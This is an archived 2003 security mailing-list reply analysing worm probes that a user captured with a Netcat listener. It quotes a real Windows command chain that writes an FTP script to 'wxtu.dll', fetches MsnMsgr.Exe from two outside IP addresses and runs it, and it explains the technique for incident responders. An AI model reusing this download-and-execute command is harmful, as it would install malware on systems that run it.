Security Incidents mailing list archives
Re: New Worm or Worm Variant?
From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 11 Dec 2003 05:41:00 -0800 (PST)
I've been seeing a jump in 20168/tcp scans over the past week or so. This port is commonly associated with the Lovegate worm.
Not always a good idea to go w/ default ports. It may be a way to start, but most malware is configurable, and new stuff is coming out all the time.
I recently set up a port listener using Netcat to capture any output from probes against a couple of my systems. Shown below are the results:
Good man! It's about time someone decided to do that without having to be asked...
echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe),
At first glance? That's exactly what it is!
but Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind).
That's b/c wxtu.dll is nothing but a text file in this case. The 'echo' statements and redirection are used to create the DLL...it's not surprising (shouldn't be) that you're not seeing references to it on Google. This is similar to the IRC bots a bit ago...each new variation of the bot had different scripts and different names, but they all used mIRC32.exe and hidewndw.exe at their core. Each variation simply changed the names of the executables. I took a look at the RussianTopz bot, which used statistics.exe and Teamscan32.exe, respectively.
1) Has anyone run across anything like this before? This looks like something automated to me.
That's b/c it *is* automated.
2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point.
The DLL is just an FTP script file. It's not necessarily "malware" in and of itself. To be honest, the commands you captured (thanks, again, btw) are very clear on that.
MsnMsgr.Exe seems to be the exploit itself, it it appears to be using something like FTPCOM to do a non-interactive FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable. Ideas?
Yeah, you're WAY off base. While MsnMsgr.exe *is* the malware, the DLL you keep looking at is *NOT* a real DLL and is *NOT* executable. It's very, very clear from what you've sent that the DLL is nothing more than a script file, fulled with FTP commands. Go to the online help on your system and look up FTP. BTW...what the *hell* is FTPCOM??? ;-) HTH, Harlan --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
- Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
- RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)